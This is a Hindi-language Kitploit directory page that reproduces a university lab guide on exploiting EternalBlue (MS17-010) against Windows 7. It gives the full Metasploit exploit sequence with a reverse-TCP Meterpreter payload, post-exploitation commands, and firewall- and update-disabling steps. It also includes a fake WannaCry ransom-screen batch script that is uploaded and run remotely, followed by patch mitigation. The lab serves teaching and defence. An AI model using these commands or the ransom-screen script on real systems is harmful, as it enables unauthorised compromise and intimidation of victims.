Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EternalBlue-Exploit-Demonstration — शैक्षिक प्रयोगशाला जो विंडोज 7 के विरुद्ध EternalBlue (MS17-010) शोषण का प्रदर्शन करती है, जिसमें Metasploit का उपयोग करते हुए पोस्ट-एक्सप्लॉइटेशन, WannaCry ransomware सिमुलेशन, और पृथक वातावरण में पैच मिटिगेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणपोस्ट-शोषणमालवेयर विश्लेषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
रेड टीमिंग
लैब और अभ्यास
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

शैक्षिक प्रयोगशाला जो विंडोज 7 के विरुद्ध EternalBlue (MS17-010) शोषण का प्रदर्शन करती है, जिसमें Metasploit का उपयोग करते हुए पोस्ट-एक्सप्लॉइटेशन, WannaCry ransomware सिमुलेशन, और पृथक वातावरण में पैच मिटिगेशन शामिल है।

रिपॉजिटरी देखें
145 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EternalBlue एक्सप्लॉइट प्रदर्शन (MS17-010)

साइबर सुरक्षा लैब जो CVE-2017-0144 (EternalBlue) का उपयोग करके Metasploit के माध्यम से एक असुरक्षित Windows 7 सिस्टम का शोषण करती है, और Meterpreter के ज़रिए SYSTEM-स्तर की पहुँच प्राप्त करती है।

यह परियोजना WannaCry-शैली के रैनसमवेयर हमले (सुरक्षित डेमो) का अनुकरण भी करती है और MS17-010 सुरक्षा पैच का उपयोग करके शमन प्रदर्शित करती है।


मॉड्यूल जानकारी

मॉड्यूल: CSCM828 सुरक्षा कमजोरियाँ और पेनिट्रेशन टेस्टिंग

छात्र:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

विश्वविद्यालय: Swansea University


संसाधन और डाउनलोड

  1. MS17-010 EternalBlue SMB रिमोट विंडोज कर्नेल पूल करप्शन
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 सुरक्षा अपडेट)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (वर्चुअल मशीन डाउनलोड)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. अवलोकन

यह लैब प्रदर्शित करता है:

  • SMB कमजोरी (MS17-010) का रिमोट एक्सप्लॉइटेशन
  • EternalBlue के माध्यम से कर्नेल-स्तर की पहुँच
  • Meterpreter सत्र स्थापना
  • पोस्ट-एक्सप्लॉइटेशन तकनीकें
  • WannaCry-शैली ransomware सिमुलेशन (सुरक्षित)
  • पैचिंग के माध्यम से शमन

2. लैब वातावरण

आवश्यकताएँ

  • VMware Workstation / VirtualBox
  • न्यूनतम 8GB RAM

हमलावर मशीन

  • Kali Linux
  • Metasploit फ्रेमवर्क

पीड़ित मशीन

  • Windows 7 SP1 x64 (अनपैच्ड)

नेटवर्क

  • होस्ट-ओनली / NAT (पृथक वातावरण)
  • सुनिश्चित करें कि दोनों मशीनें संवाद कर सकें

⚠️ यह लैब पूरी तरह से पृथक वातावरण में संचालित की जानी चाहिए।


3. पीड़ित सेटअप (Windows 7)

एडमिनिस्ट्रेटर कमांड प्रॉम्प्ट में चलाएँ:

फायरवॉल अक्षम करें

netsh advfirewall set allprofiles state off

SMB पोर्ट सत्यापित करें

netstat -an | findstr :445

अपडेट अक्षम करें (लैब स्थिरता के लिए)

sc stop wuauserv
sc config wuauserv start= disabled

4. हमलावर सेटअप (Kali Linux)

कनेक्टिविटी सत्यापित करें

ping <victim-ip>
nmap -p 445 <victim-ip>

5. एक्सप्लॉइटेशन चरण

चरण 1: लक्ष्य स्कैन करें

nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • होस्ट असुरक्षित है

चरण 2: एक्सप्लॉइट चलाएँ

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

चरण 3: पहुँच की पुष्टि करें

meterpreter > getuid

अपेक्षित:

NT AUTHORITY\SYSTEM

6. पोस्ट-एक्सप्लॉइटेशन

sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

स्थिर माइग्रेशन

ps
migrate <explorer.exe PID>

7. WannaCry सिमुलेशन (सुरक्षित डेमो)

पेलोड बनाएँ (Kali)

cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

अपलोड और निष्पादित करें

meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. शमन (पैच प्रदर्शन)

चरण 1: पैच डाउनलोड करें

  • यहाँ जाएँ: https://www.catalog.update.microsoft.com/
  • खोजें: KB4012212 Windows 7 x64
  • .msu फ़ाइल डाउनलोड करें

चरण 2: पैच स्थापित करें

wusa.exe KB4012212-x64.msu /quiet /norestart

चरण 3: पुनरारंभ करें

shutdown /r /t 0

चरण 4: पैच सत्यापित करें

systeminfo | findstr KB4012212

चरण 5: एक्सप्लॉइट पुनः चलाएँ

अपेक्षित:

  • एक्सप्लॉइट विफल होता है
  • कोई Meterpreter सत्र नहीं

चरण 6: Nmap से सत्यापित करें

nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • असुरक्षित नहीं

9. समस्या निवारण

समस्यासमाधान
एक्सप्लॉइट विफल होता हैकनेक्टिविटी जाँचें
कोई सत्र नहींफायरवॉल अक्षम करें
सत्र समाप्त हो जाता हैएक्सप्लॉइट पुनः प्रयास करें
कोई दृश्य विंडो नहींexplorer.exe पर माइग्रेट करें

10. नैतिक विचार

यह परियोजना संचालित की गई है:

  • केवल नियंत्रित लैब मशीनों पर
  • पूरी तरह से पृथक नेटवर्क में
  • केवल शैक्षिक उद्देश्यों के लिए

अनधिकृत उपयोग उल्लंघन करता है:

  • यूके कंप्यूटर मिसयूज़ अधिनियम 1990

11. निष्कर्ष

यह लैब प्रदर्शित करता है:

  • EternalBlue का उपयोग कर वास्तविक दुनिया का SMB एक्सप्लॉइटेशन
  • Windows 7 का SYSTEM-स्तर से समझौता
  • Ransomware हमला सिमुलेशन (सुरक्षित)
  • समय पर पैचिंग का महत्व
टूल डाउनलोड करें